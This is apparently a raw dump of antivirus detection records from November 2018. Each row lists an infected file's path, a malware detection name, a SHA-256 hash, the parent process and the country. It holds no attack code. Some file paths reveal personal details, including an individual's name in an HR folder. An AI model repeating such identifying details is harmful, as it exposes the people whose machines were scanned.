  Row(detection=Row(filename='ultimatedefrag.exe', filepath='E:\\HBCD\\Programs\\UltimateDefrag.exe', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221517-5d5f4d12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221517-5D5F4D12', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tcls_core.exe', filepath='C:\\Program Files\\WeGame\\tcls\\tcls_core.exe', filesize=1124000, name='W32/Sality.AT.#M1.#R1'), hash='9ecc70cccfac22c196ba9658a9971ee4534aa55e5854527c4a81b5baa17b9762', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:UCbovtIsukesVsaw.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:12:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mahanadi.exe', filepath='G:\\\xa0\\mahanadi\\mahanadi.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ca981ba13cdb098634ddd225c3c005ae1d1e2286b37be646f9564e229e87ae1a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T12:51:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='esplodew.exe', filepath='\\\\ts-xelcea\\share\\sts2008b\\cdswin\\esplodeW.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='c57cb68e67c5047cc23040c65b5601610ddf2166f43b1f9f900a3aabf59a5e3e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='хабибуллина р.р.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка на 2015 год\\Хабибуллина Р.Р.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:52:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='getdiskserial.exe', filepath='C:\\Users\\X\\Desktop\\Hirens 7\\HBCD\\Programs\\GetDiskSerial.exe', filesize=64000, name='TR/Siggen.psvbr.#M1.#R1'), hash='bc0a114c0973d821f584a672f3d2c3b951288a0e721901ada7bd47acea4cdd2d', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Update \\\\\\/Quiet  \\\\\\/InstallFile \\\\\\"C:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\Install.esd\\\\\\" \\\\\\/progressCLSID 06cfe2c4-1c5b-4002-bca2-d0667fe5b626 \\\\\\/ReportId {C3BD4254-41A1-4918-A51A-1C74251DF7F3}.201 \\\\\\"\\\\\\/ClientId\\\\\\" \\\\\\"1eeffbbd-5a32-4a02-af22-5323b7db6150\\\\\\" \\\\\\"\\\\\\/CorrelationVector\\\\\\" \\\\\\"pR8P7z\\\\\\/JgEW3X9Vd.5.1.2\\\\\\" \\\\\\/WUCachedFileName \\\\\\"17134.1.180410-1804.rs4_release_CLIENTCONSUMER_RET_x86FRE_en-us.esd\\\\\\"', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=697528, timestamp='2018-11-02T20:27:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mylanviewer.exe', filepath='E:\\HBCD\\Programs\\MyLanViewer.exe', filesize=64000, name='TR/Siggen.64000.8.#M1.#R1'), hash='928970136fecc731176bb438d4e172a4564f71cc3e402b006f5210c251f1a380', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='raw05308.dll', filepath='C:\\Doreen\\RPTMP0\\Raw05308.DLL', filesize=128000, name='HEUR/Patched.Ren.#M1.#R1'), hash='ccb8e256ddcf9547a0822c26b0b262d61d5fe6a433885a0717ed928e1a408f8a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Unerase\\RescuePro 3.0\\RescuePRO\\RescuePRO.exe', parentsize=4233728, timestamp='2018-11-02T15:41:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vcredist2013_x64.exe', filepath='D:\\Software\\UPdates\\cpp\\vcredist2013_x64.exe', filesize=7284000, name='W32/Neshta.A.#M1.#R1'), hash='f85a7c5d5985881fb4c0585bbf0802ab29f94e93fda6db63142376e927f74ebc', metadata=Row(cmdline='\\\\\\/boottime', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\Suo12_StartupManager.exe', parentsize=4046608, timestamp='2018-11-02T13:22:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\goyeegboaoh\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:33:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winbox-2.2.18.exe', filepath='C:\\Users\\X\\Desktop\\winbox-2.2.18.exe', filesize=192000, name='W32/Sality.AG.#M1.#R1'), hash='b1884840ea6b92ac2134c8ac835a6bd64d096b80fa6cab37b8c91a804fccf9aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T20:25:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212831-77642ee3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_19e2935b\\AVSCAN-20181102-212415-53B6D721\\AVSCAN-20181102-212831-77642EE3', filesize=2496000, name='Adware/Wajam.deane.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:28:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='skincrafterdll.dll', filepath='\\\\?\\E:\\easy driver\\Easy.Driver.Packs.v5.2.5.5.Win7.32-Bit\\Files\\SkinCrafterDll.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='f12867176ab630fb6925b49833ca53fbea560bccf47fa70463a8eaca149906f7', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:19:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0000424.exe', filepath='I:\\System Volume Information\\_restore{E84A6146-B4E6-4221-92EC-2972DFB0FF8C}\\RP2\\A0000424.exe', filesize=1520000, name='W32/Ramnit.C.#M1.#R1'), hash='ff61d82d1f9530d5ef588bf5f098ffc6e4cf8ef963305e5fde51619e3a83a96f', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-02T16:26:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-184447-b01db7b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184447-B01DB7B4', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:44:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T08:38:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290d63', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290d63', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:41:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135035-30e30d5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3272e11a\\AVSCAN-20181104-134818-228F6BDB\\AVSCAN-20181104-135035-30E30D5A', filesize=5444000, name='PUA/Systweak.#M1.#R1'), hash='c8f28ea521eb29b88e8279c4e7b5df617cf50c64764bde1a443883b3a13046be', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:50:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203455-22c342c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-203455-22C342C3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:34:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239614', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239614', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:41:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:44:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ebc4', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ebc4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:06:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0001321.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{5BEF2280-202E-4A37-AED8-0DB4E065AD64}\\RP0\\A0001321.exe', filesize=128000, name='HEUR/AGEN.1008649.#M1.#R1'), hash='d3ce884fba7a2572fc73047c3d0b7ee2b70c14a5cb523aea791cc29639e05035', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:44:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0028ff72', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0028ff72', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:25:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='e:\\packardbell yedek\\masaustusonhali\\setupsmuhendislik\\coreldraw13\\program files\\common files\\microsoft shared\\vba\\vba6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='ea27d097eb2acac01fab9bdf67305c38049ee09e9abc7d17d09a3282e4d00742', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:34:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='regsvr.exe', filepath='N:\\regsvr.exe', filesize=128000, name='TR/Crypt.Xpack.8894.#M1.#R1'), hash='f25c1daf238a29d6211ff51ea00bb12d968e281d6e06ff4599ce9e62a5574578', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:55:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nmbcwriter.exe', filepath='C:\\Program Files\\Common Files\\Ahead\\Lib\\NMBCWriter.exe', filesize=192000, name='W32/Jeefo.A.#M1.#R1'), hash='f686f7b925590fd1c0ffb2b677d6bbf8194f121791e39e466125012eb6d53cc3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T03:25:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-24-005245/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:03:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f4b808f543ea5f7cdc9bd73eed5b6b80a1eed6d176305b3e6f6538aa53744b31', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F4B808F543EA5F7CDC9BD73EED5B6B80A1EED6D176305B3E6F6538AA53744B31', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f4b808f543ea5f7cdc9bd73eed5b6b80a1eed6d176305b3e6f6538aa53744b31', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:40:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e29c5a190688ba26fbd7de64d20a380f0cad6fa9b81fbb2c3c99bf99fde8e6c4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T17:30:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T07:07:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa41a0bd12206ff792eccb21633f5722d87019c93035ad5484faf186f3a6fae8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\FA41A0BD12206FF792ECCB21633F5722D87019C93035AD5484FAF186F3A6FAE8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fa41a0bd12206ff792eccb21633f5722d87019c93035ad5484faf186f3a6fae8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:51:53Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-151436-94400ba6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-151436-94400BA6', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='127.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\127\\127.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:14:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-02T12:31:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105426-495d2471', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7b872c6c\\AVSCAN-20181102-104924-1CD3574C\\AVSCAN-20181102-105426-495D2471', filesize=768000, name='TR/Drop.Agent.768000.1.#M1.#R1'), hash='3753b3b424847cb90dde4541fa7f7a0d5b0fc2417be35337c830b79ed5be0f3e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:54:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3A5E26416CED265E1D0F270AC3B717E83A707A06EFE6655B6B3D89847A8B6610', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:20:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190131-6a89640f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d5ec04e\\AVSCAN-20181102-185412-19B88F55\\AVSCAN-20181102-190131-6A89640F', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whxdata.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\whxdata\\whxdata.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\Temp\\TrustedInstaller.exe', filesize=192000, name='BDS/Androm.EB.73.#M1.#R1'), hash='0cd834eaeccc8ef4ac62b7b9a14d7a0270bfbecc774c8387cdf720bcaa3f32fa', metadata=Row(cmdline='\\\\\\/increment', country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\aitagent.exe', parentsize=None, timestamp='2018-11-02T05:11:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:57:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='firefox installer.exe', filepath='\\?\\S:\\   PC-instal\\Firefox Installer.exe', filesize=128000, name='W32/Gael.3666.#M1.#R1'), hash='3a6640d7650a85d6b4029725c1d1c8be872c258553e760b91da2b831603b70bc', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:52:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='F:\\SEARCHPROTOCOLHOST.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='6885ab5a728641ff27aa2b1e432b83f7565bb040bc8ad3c5e4cce6db011116cf', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1903728, timestamp='2018-11-02T09:38:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081230-25fb3d4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081017-150DB878\\AVSCAN-20181102-081230-25FB3D4C', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:12:29Z'), dt=datetime.date(2018, 11, 2)),
